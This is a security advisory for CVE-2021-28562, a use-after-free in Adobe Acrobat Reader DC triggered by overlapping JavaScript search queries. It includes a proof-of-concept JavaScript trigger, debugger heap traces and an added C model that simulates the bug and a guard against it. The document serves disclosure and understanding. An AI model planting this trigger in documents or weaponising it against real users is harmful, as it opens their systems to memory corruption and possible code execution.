CVE-2021-28562
A use-after-free vulnerability exists in the way Adobe Acrobat Reader DC 2020.013.20074 executes search queries through JavaScript. A specially crafted PDF document can trigger this vulnerability, which can lead to arbitrary code execution. A victim needs to open the malicious file to trigger this vulnerability.
Adobe Acrobat Reader 2020.013.20074
https://acrobat.adobe.com/us/en/acrobat/pdf-reader.html
8.0 - CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H
CWE-416 - Use After Free
Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers on the market. It has a large user base and is usually a default PDF reader on systems. It also integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.
Adobe Acrobat Reader DC supports embedded JavaScript code in PDFs to allow for interactive PDF forms. This gives a potential attacker the ability to precisely control memory layout and poses additional attack surface. JavaScript allows manipulation of form fields and other page content in a PDF document.
A vulnerability exists in the way Adobe Reader executes search queries through the search.query JavaScript API. It appears that a concurrency issue between two overlapping queries can lead to a use-after-free condition. The following code from the PoC demonstrates triggering this vulnerability:
function main() {
    // Open the search dialog with a first query.
    app.activeDocs[0].search.query("test");
    // Install f() as the Format event handler of field txt2.
    getField('txt2').setAction("Format", 'f();');
    // Switching pages fires the Format event for txt2 ...
    app.activeDocs[0].pageNum = 2;
    // ... but this query is issued before the handler runs, so the two overlap.
    app.activeDocs[0].search.query("test3");
}

function f() {
    // Re-entrant query issued from inside the Format event handler.
    app.activeDocs[0].search.query("test2");
}

this.pageNum = 0;
// Delay so the document is fully loaded before the sequence runs.
var r = app.setTimeOut("main()", 2000);
The code above demonstrates an interesting sequence of events. First, a search dialog is opened by the first search query. An event handler for field txt2 is set to trigger on the Format event and call function f. Then the current page is switched to page 2. Switching the page triggers the Format event, but the last search query call is initiated before the event handler (function f) is executed. Calling search.query spawns a whole new dialog but yields execution back, so the call from main and the call from the event handler overlap. This can lead to an object being freed prematurely and later reused. This can be observed in a debugger:
Breakpoint 4 hit
eax=37628fc8 ebx=00000001 ecx=a180629b edx=09c30000 esi=00000000 edi=3ec80f38
eip=687383d1 esp=052fe298 ebp=052fe2ac iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00200202
AcroRd32!ixVectorNextHit+0xf3291:
687383d1 3b5df8 cmp ebx,dword ptr [ebp-8] ss:002b:052fe2a4=00000007
0:000> bu AcroRd32!ixVectorNextHit+0xf214f "!heap -p -a esi ; g"
...
...
address 3f1c8fc8 found in
_DPH_HEAP_ROOT @ 9c31000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
432b0b2c: 3f1c8fc8 38 - 3f1c8000 2000
? AcroRd32!CTJPEGThrowException+25ee10
697eabb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
7721245b ntdll!RtlDebugAllocateHeap+0x00000039
77176dd9 ntdll!RtlpAllocateHeap+0x000000f9
77175ec9 ntdll!RtlpAllocateHeapInternal+0x00000179
77175d3e ntdll!RtlAllocateHeap+0x0000003e
74f5f0c7 ucrtbase!_calloc_base+0x00000037
678f4909 AcroRd32!AcroWinMainSandbox+0x00004fd9
678f48c4 AcroRd32!AcroWinMainSandbox+0x00004f94
6873821d AcroRd32!ixVectorNextHit+0x000f30dd
687378b6 AcroRd32!ixVectorNextHit+0x000f2776
687396fc AcroRd32!ixVectorNextHit+0x000f45bc
6873842f AcroRd32!ixVectorNextHit+0x000f32ef
684c1639 AcroRd32!AIDE::PixelPartInfo::operator=+0x00416af9
684c7d6d AcroRd32!AIDE::PixelPartInfo::operator=+0x0041d22d
681b75c1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010ca81
681b6a63 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010bf23
646df9db Search!myASUCSlowercase+0x0000383b
6821d2da AcroRd32!AIDE::PixelPartInfo::operator=+0x0017279a
654a3551 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005b331
65432ab5 EScript!mozilla::HashBytes+0x00042505
65417115 EScript!mozilla::HashBytes+0x00026b65
65411ccf EScript!mozilla::HashBytes+0x0002171f
65410c3c EScript!mozilla::HashBytes+0x0002068c
65410b4c EScript!mozilla::HashBytes+0x0002059c
65410a81 EScript!mozilla::HashBytes+0x000204d1
653f9ed0 EScript!mozilla::HashBytes+0x00009920
65439555 EScript!mozilla::HashBytes+0x00048fa5
6543925a EScript!mozilla::HashBytes+0x00048caa
65438bce EScript!mozilla::HashBytes+0x0004861e
65437979 EScript!mozilla::HashBytes+0x000473c9
654b2351 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0006a131
67964552 AcroRd32!DllCanUnloadNow+0x00020802
...
...
...
(a1c.584): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=052fe05c ebx=1f620fd0 ecx=3f1c8fdc edx=4cc30ff8 esi=3f1c8fc8 edi=68c1c2b8
eip=6791ec4e esp=052fe044 ebp=052fe044 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210202
AcroRd32!CTJPEGLibInit+0x681e:
6791ec4e 8b5104 mov edx,dword ptr [ecx+4] ds:002b:3f1c8fe0=????????
0:000> !heap -p -a ecx
address 3f1c8fdc found in
_DPH_HEAP_ROOT @ 9c31000
in free-ed allocation ( DPH_HEAP_BLOCK: VirtAddr VirtSize)
432b0b2c: 3f1c8000 2000
697eae02 verifier!AVrfDebugPageHeapFree+0x000000c2
77212c91 ntdll!RtlDebugFreeHeap+0x0000003e
77173c45 ntdll!RtlpFreeHeap+0x000000d5
77173812 ntdll!RtlFreeHeap+0x00000222
74f5f43b ucrtbase!_free_base+0x0000001b
74f5f408 ucrtbase!free+0x00000018
678f7b79 AcroRd32!AcroWinMainSandbox+0x00008249
68737294 AcroRd32!ixVectorNextHit+0x000f2154
687383ce AcroRd32!ixVectorNextHit+0x000f328e
6873842f AcroRd32!ixVectorNextHit+0x000f32ef
684c7d6d AcroRd32!AIDE::PixelPartInfo::operator=+0x0041d22d
681b75c1 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010ca81
681b6a63 AcroRd32!AIDE::PixelPartInfo::operator=+0x0010bf23
646df9db Search!myASUCSlowercase+0x0000383b
6821d2da AcroRd32!AIDE::PixelPartInfo::operator=+0x0017279a
654a3551 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x0005b331
65432ab5 EScript!mozilla::HashBytes+0x00042505
65417115 EScript!mozilla::HashBytes+0x00026b65
65411ccf EScript!mozilla::HashBytes+0x0002171f
65410c3c EScript!mozilla::HashBytes+0x0002068c
65410b4c EScript!mozilla::HashBytes+0x0002059c
65410a81 EScript!mozilla::HashBytes+0x000204d1
653f9ed0 EScript!mozilla::HashBytes+0x00009920
65439555 EScript!mozilla::HashBytes+0x00048fa5
6543925a EScript!mozilla::HashBytes+0x00048caa
65438bce EScript!mozilla::HashBytes+0x0004861e
65437979 EScript!mozilla::HashBytes+0x000473c9
679de1ff AcroRd32!DllCanUnloadNow+0x0009a4af
6630f3b8 AcroForm!hb_ot_tags_to_script_and_language+0x00093258
6630efb0 AcroForm!hb_ot_tags_to_script_and_language+0x00092e50
66181ae7 AcroForm!hb_set_invert+0x000c9b57
66181986 AcroForm!hb_set_invert+0x000c99f6
Objects are being freed in a loop starting at breakpoint 4. A breakpoint that prints heap information before each object is freed is then enabled, so we can observe the object sizes and where they were allocated. Finally, an access violation is triggered by an invalid memory access (with PageHeap enabled). The crash is due to a read instruction on memory pointed to by ecx. From the heap output, we can see that the memory belonged to an object of size 0x38 which was freed in the previous loop and that the memory is still free at the time of reuse. This constitutes a use-after-free. Since additional code is executed between the free and the reuse, the memory could be reclaimed and controlled, which could lead to further memory corruption and ultimately arbitrary code execution. The full call stack at the time of the crash follows:
0:000> kv
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 052fe044 6873817a 052fe05c 3d229ff0 052fe338 AcroRd32!CTJPEGLibInit+0x681e
01 052fe054 68737bb5 68c1c2b8 4cc30ff8 a180632f AcroRd32!ixVectorNextHit+0xf303a
02 052fe338 687396fc 00000000 6873841a 3ec8cda0 AcroRd32!ixVectorNextHit+0xf2a75
03 052fe35c 6873842f 3ec8cda0 68738420 684c6823 AcroRd32!ixVectorNextHit+0xf45bc
04 052fe380 684c1639 3ec8cda0 30c4cf00 41800af8 AcroRd32!ixVectorNextHit+0xf32ef
05 052fe3a0 684c7d6d 3ec8cda0 00000000 67d009b0 AcroRd32!AIDE::PixelPartInfo::operator=+0x416af9
06 052fe3d4 681b75c1 00000000 00000000 00000001 AcroRd32!AIDE::PixelPartInfo::operator=+0x41d22d
07 052fe3f4 681b6a63 00000000 00000001 a18064bf AcroRd32!AIDE::PixelPartInfo::operator=+0x10ca81
08 052fe4a8 646df9db 052fe4f4 646df9b0 052fe4c8 AcroRd32!AIDE::PixelPartInfo::operator=+0x10bf23
09 052fe4b8 6821d2da 052fe4f4 6821d2b0 052fe5b8 Search!myASUCSlowercase+0x383b
0a 052fe4c8 654a3551 052fe4f4 c790de91 38c44fb8 AcroRd32!AIDE::PixelPartInfo::operator=+0x17279a
0b 052fe5b8 65432ab5 38c44fb8 3645eff8 28ab6fb8 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x5b331
0c 052fe700 65417115 3044af58 00000001 376d70c0 EScript!mozilla::HashBytes+0x42505
0d 052fe774 65411ccf 3044af58 376d70d0 00000001 EScript!mozilla::HashBytes+0x26b65
0e 052fec30 65410c3c 00000000 65410c3c 3044af58 EScript!mozilla::HashBytes+0x2171f
0f 052fec70 65410b4c 3044af58 052fec84 3044af58 EScript!mozilla::HashBytes+0x2068c
10 052fecac 65410a81 3044af58 052fed20 37429ad8 EScript!mozilla::HashBytes+0x2059c
11 052fece0 653f9ed0 3044af58 052fed20 37429ad8 EScript!mozilla::HashBytes+0x204d1
12 052fed30 65439555 3044af58 052fedb0 00000000 EScript!mozilla::HashBytes+0x9920
13 052fedb4 6543925a 3044af58 37429ad8 2a1b6ff0 EScript!mozilla::HashBytes+0x48fa5
14 052fef68 65438bce 21cf6ff0 39040fe0 39082ff0 EScript!mozilla::HashBytes+0x48caa
15 052fefb4 65437979 30312fc0 42a1efb8 3ce20fe0 EScript!mozilla::HashBytes+0x4861e
16 052ff054 654b2351 20934bc8 42a1efb8 408dcfe0 EScript!mozilla::HashBytes+0x473c9
17 052ff098 67964552 416ecfe0 a18070f7 1967cf58 EScript!double_conversion::DoubleToStringConverter::CreateDecimalRepresentation+0x6a131
18 052ff0e0 67963eb9 000001ca a1807147 0d878fd0 AcroRd32!DllCanUnloadNow+0x20802
19 052ff150 67963ce7 000001ca 67963c34 a1807197 AcroRd32!DllCanUnloadNow+0x20169
1a 052ff180 678fa715 000004d3 00000000 00000113 AcroRd32!DllCanUnloadNow+0x1ff97
1b 052ff19c 75d0bf1b 00190b36 00000113 000004d3 AcroRd32!AcroWinMainSandbox+0xade5
1c 052ff1c8 75d083ea 678fa250 00190b36 00000113 USER32!_InternalCallWinProc+0x2b
1d 052ff2b0 75d07c9e 678fa250 00000000 00000113 USER32!UserCallWinProcCheckWow+0x3aa (FPO: [SEH])
1e 052ff32c 75d07a80 694fd5a0 052ff350 679630d3 USER32!DispatchMessageWorker+0x20e (FPO: [Non-Fpo])
1f 052ff338 679630d3 052ff36c 0d84edd0 0d84edd0 USER32!DispatchMessageW+0x10 (FPO: [Non-Fpo])
20 052ff350 67962dde 052ff36c a18073d3 0d84edd0 AcroRd32!DllCanUnloadNow+0x1f383
21 052ff3c4 67962c09 a18073eb 0d84edd0 00000000 AcroRd32!DllCanUnloadNow+0x1f08e
22 052ff3fc 678f0081 a1807467 0d5abf88 00000000 AcroRd32!DllCanUnloadNow+0x1eeb9
23 052ff470 678efab1 678c0000 00af0000 0d5abf88 AcroRd32!AcroWinMainSandbox+0x751
24 052ff890 00af89e7 678c0000 00af0000 0d5abf88 AcroRd32!AcroWinMainSandbox+0x181
25 052ffc78 00c2e27a 00af0000 00000000 09c4a7bc AcroRd32_exe+0x89e7
26 052ffcc4 76778494 0514a000 76778470 99d6e848 AcroRd32_exe!AcroRd32IsBrokerProcess+0xae05a
27 052ffcd8 771941c8 0514a000 140f174f 00000000 KERNEL32!BaseThreadInitThunk+0x24 (FPO: [Non-Fpo])
28 052ffd20 77194198 ffffffff 771af34f 00000000 ntdll!__RtlUserThreadStart+0x2f (FPO: [SEH])
29 052ffd30 00000000 00af1490 0514a000 00000000 ntdll!_RtlUserThreadStart+0x1b (FPO: [Non-Fpo])
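To make the re-entrancy pattern concrete, the following C model is added here as an illustration; it is not Adobe's code, is not derived from the Reader binary, and all names in it (hit_t, search_ctx, run_search, on_hit, demo) are hypothetical. It reproduces the shape of the bug described above: a search builds a vector of hit objects and walks it, invoking a per-hit callback that stands in for the Format event handler f(); when that callback starts another query, the vector being walked is torn down under the outer loop. The "free" is simulated with a live flag plus a quarantine so the stale access is observed deterministically (the role PageHeap plays in the advisory) instead of as undefined behaviour. The hardened variant refuses a query issued while a walk is in progress; a real fix could equally defer it, but either way the walk must never continue over a vector that a nested call was allowed to free.

```c
#include <stdio.h>
#include <stdlib.h>

/* Added illustration, not Adobe's code. Models a search that walks a hit
 * vector and calls a per-hit callback which may re-enter the search and
 * tear the vector down. Names are hypothetical. */

#define HIT_SIZE 0x38      /* size of the freed object in the advisory's heap output */
#define MAX_QUAR 64

typedef struct { int live; char data[HIT_SIZE - sizeof(int)]; } hit_t;

typedef struct search_ctx {
    hit_t **hits;             /* current hit vector */
    size_t  nhits;
    int     walking;          /* depth of walks in progress: re-entrancy guard */
    int     guard_enabled;    /* 0 = vulnerable behaviour, 1 = hardened */
    int     reentered;        /* callback re-enters only once, to avoid recursion */
    int     uaf_detected;     /* stale hit touched after teardown */
    int     nested_rejected;  /* nested queries refused by the guard */
    void   *quarantine[MAX_QUAR];
    size_t  nquar;
} search_ctx;

/* Simulated free: park the block so the memory stays mapped and readable. */
static void fake_free(search_ctx *s, void *p) {
    if (s->nquar < MAX_QUAR) s->quarantine[s->nquar++] = p; else free(p);
}

/* Frees the previous results; in the advisory this is the loop at breakpoint 4. */
static void teardown_hits(search_ctx *s) {
    for (size_t i = 0; i < s->nhits; i++) {
        s->hits[i]->live = 0;
        fake_free(s, s->hits[i]);
    }
    if (s->hits) fake_free(s, s->hits);
    s->hits = NULL;
    s->nhits = 0;
}

static int run_search(search_ctx *s, const char *query, size_t nhits);

/* Per-hit callback: on the first hit it issues a nested query, like f()
 * calling search.query("test2") from inside the Format handler. */
static void on_hit(search_ctx *s, size_t idx) {
    if (idx == 0 && !s->reentered) {
        s->reentered = 1;
        run_search(s, "test2", 2);
    }
}

static int run_search(search_ctx *s, const char *query, size_t nhits) {
    (void)query;
    if (s->guard_enabled && s->walking) {   /* hardened: refuse re-entrant queries */
        s->nested_rejected++;
        return -1;
    }
    teardown_hits(s);                        /* old results freed here */
    s->hits = calloc(nhits, sizeof *s->hits);
    for (size_t i = 0; i < nhits; i++) {
        s->hits[i] = calloc(1, sizeof(hit_t));
        s->hits[i]->live = 1;
    }
    s->nhits = nhits;

    hit_t **walk = s->hits;                  /* raw pointer captured before the loop */
    size_t  n    = nhits;
    s->walking++;
    for (size_t i = 0; i < n; i++) {
        if (!walk[i]->live) {                /* vector was torn down under us: UAF */
            s->uaf_detected++;
            break;
        }
        on_hit(s, i);                        /* may re-enter and call teardown_hits() */
    }
    s->walking--;
    return 0;
}

/* Runs the advisory's sequence (a query whose handler issues a nested query)
 * and returns how many stale hits the outer walk touched. */
static int demo(int guard_enabled, int *nested_rejected) {
    search_ctx s = {0};
    s.guard_enabled = guard_enabled;
    run_search(&s, "test", 3);
    int stale = s.uaf_detected;
    if (nested_rejected) *nested_rejected = s.nested_rejected;
    teardown_hits(&s);
    for (size_t i = 0; i < s.nquar; i++) free(s.quarantine[i]);
    return stale;
}

int main(void) {
    int rejected = 0;
    printf("vulnerable: stale hits touched = %d\n", demo(0, &rejected));
    int stale = demo(1, &rejected);
    printf("hardened:   stale hits touched = %d, nested queries rejected = %d\n",
           stale, rejected);
    return 0;
}
```

In the vulnerable run the outer walk resumes after the callback and reads a hit that the nested query already freed, which is the same ordering the heap output above shows: the 0x38-byte object is freed in the loop and then dereferenced through ecx. With the guard enabled the nested query is rejected and the walk completes over live objects only.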
2021-01-23 - Vendor Disclosure
2021-05-11 - Public Release
Discovered by Aleksandar Nikolic of Cisco Talos.